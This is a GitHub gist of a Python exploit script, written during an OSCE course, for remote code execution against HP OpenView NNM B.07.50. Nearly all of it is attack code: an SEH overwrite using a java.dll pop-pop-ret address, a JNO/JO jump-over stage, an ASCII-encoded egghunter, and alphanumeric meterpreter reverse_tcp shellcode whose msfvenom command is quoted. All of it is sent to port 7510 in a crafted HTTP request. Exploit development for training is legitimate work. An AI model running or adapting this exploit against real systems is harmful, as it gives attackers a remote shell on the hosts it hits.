-
-
Save JamesMilazzo/7e9ae0b780980c2113581dec7537c4a1 to your computer and use it in GitHub Desktop.
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# HP OpenView NNM B.07.50 Remote Code Execution exploit | |
# by Mariusz B. / mgeeky, 17' | |
import struct | |
import socket | |
HOST = '192.168.XXX.YYY' | |
PORT = 7510 | |
def exploit(conn): | |
# | |
# Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler: | |
# | |
# 0x6d213d2b : pop esi # pop ebp # ret | |
# | asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False | |
return_address = 0x6d213d2b | |
ret = struct.pack('<I', return_address) | |
junk = 'A' * (3381 - 4) | |
# | |
# Stage 1: Jump over handler's address | |
# 71 08 JNO short $+8 | |
# 70 06 JO short $+6 | |
stage1 = '\x71\x08\x70\x06' | |
stage2 = 'G' * 32 | |
# This is an windows 32-byte long egghunter | |
# encoded with my custom ASCII encoder | |
# Which can be located in this gist: | |
# https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c | |
egghunter = r"%JMNU%521*TX-A777-i%" | |
egghunter += r"%%-r2II-\ZZZP\%JMNU%" | |
egghunter += r"521*-gNlN-zG1G-yQ1Q-" | |
egghunter += r"1111P-cj10-v777-uX4X" | |
egghunter += r"-xwxxP-NNNN-s1*z-J*r" | |
egghunter += r"x-ttttP-5S%w-0n4v-nn" | |
egghunter += r"nn-nnnnP-jj7j-vj%n-i" | |
egghunter += r"t3y-jjjjP-d%ud-n1rf-" | |
egghunter += r"7%tI-1111P-4Rfx-*5\v" | |
egghunter += r"-92\y-\\\\P-p222-v2v" | |
egghunter += r"v-O6wV-t%hkP" | |
stage2 += egghunter | |
stage2 += 'G' * 100 | |
stage2 += ':7510' | |
exp = junk + stage1 + ret + stage2 | |
egg = 'T00WT00W' | |
shellcode = '' | |
# | |
# Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter | |
# at the end takes a long jump to the value of EDI register, which is a base for the shellcode. | |
# | |
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \ | |
# BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d' | |
# Payload size: 720 bytes | |
# | |
shellcode += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0" | |
shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0" | |
shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL" | |
shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL" | |
shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t" | |
shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M" | |
shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt" | |
shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22" | |
shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo" | |
shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h" | |
shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx" | |
shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP" | |
shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB" | |
shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v" | |
shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH" | |
shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o" | |
shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo" | |
shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA" | |
shellcode += "\xcc" * 500 | |
buf = 'GET /topology/homeBaseView HTTP/1.1\r\n' | |
buf += 'Host: ' + exp + '\r\n' | |
buf += 'Content-Type: application/x-www-form-urlencoded\r\n' | |
buf += 'User-Agent: ' + shellcode + '\r\n' | |
buf += 'Content-Length: 1048580\r\n\r\n' | |
buf += egg + shellcode | |
print '[+] Sending HTTP packet of %d length...' % len(buf) | |
print '\tHost header len: %d' % len(exp) | |
print '\tEgghunter len: %d' % len(stage2) | |
print '\tShellcode len: %d' % len(shellcode) | |
print '[?] Wait about 7-15 seconds until exploit kicks in.' | |
conn.send(buf) | |
def main(): | |
print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit' | |
print '[*] by Mariusz B. / mgeeky, 17' | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
try: | |
print '[.] Connecting with %s:%d...' % (HOST, PORT) | |
conn = sock.connect((HOST, PORT)) | |
print '[+] Connected.' | |
except: | |
print '[!] Could not connect.' | |
return None | |
exploit(sock) | |
sock.close() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment